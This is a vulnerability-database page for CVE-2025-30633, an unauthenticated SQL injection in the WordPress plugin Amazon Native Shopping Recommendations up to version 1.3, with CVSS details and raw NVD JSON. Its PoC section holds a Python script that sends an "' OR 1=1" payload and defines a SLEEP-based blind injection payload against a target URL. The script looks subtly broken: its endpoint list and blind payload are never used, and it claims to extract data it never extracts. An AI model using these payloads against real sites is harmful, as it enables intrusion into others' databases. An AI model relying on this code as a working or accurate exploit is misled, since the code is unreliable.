Security Vulnerability Report
中文
CVE-2025-30633 CVSS 9.3 CRITICAL

CVE-2025-30633

Published: 2026-01-05 11:17:40
Last Modified: 2026-04-28 19:30:21

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Amazon Native Shopping Recommendations allows SQL Injection.This issue affects Amazon Native Shopping Recommendations: from n/a through 1.3.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

AA-Team Amazon Native Shopping Recommendations <= 1.3
WordPress Amazon Native Shopping Recommendations < 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-30633 SQL Injection PoC # Target: WordPress plugin Amazon Native Shopping Recommendations (<=1.3) def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2025-30633 This vulnerability allows unauthenticated attackers to extract sensitive data from the database. """ # Common WordPress plugin endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-content/plugins/woozone-contextual/...', ] # Vulnerable parameter injection test payload = "' OR 1=1 -- -" # Example vulnerable request pattern params = { 'action': 'amazon_native_shopping', 'keyword': payload } try: response = requests.get(target_url, params=params, timeout=10) if 'error' not in response.text.lower() and response.status_code == 200: print(f'[+] Potential vulnerability confirmed at {target_url}') print('[+] Extracting database version...') # Blind SQL injection to extract data blind_payload = "' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) -- -" return True else: print('[-] No vulnerability detected') return False except requests.RequestException as e: print(f'[-] Request failed: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-30633.py <target_url>') sys.exit(1) target = sys.argv[1] exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30633", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:40.183", "lastModified": "2026-04-28T19:30:21.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Amazon Native Shopping Recommendations allows SQL Injection.This issue affects Amazon Native Shopping Recommendations: from n/a through 1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/woozone-contextual/vulnerability/wordpress-amazon-native-shopping-recommendations-plugin-1-3-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}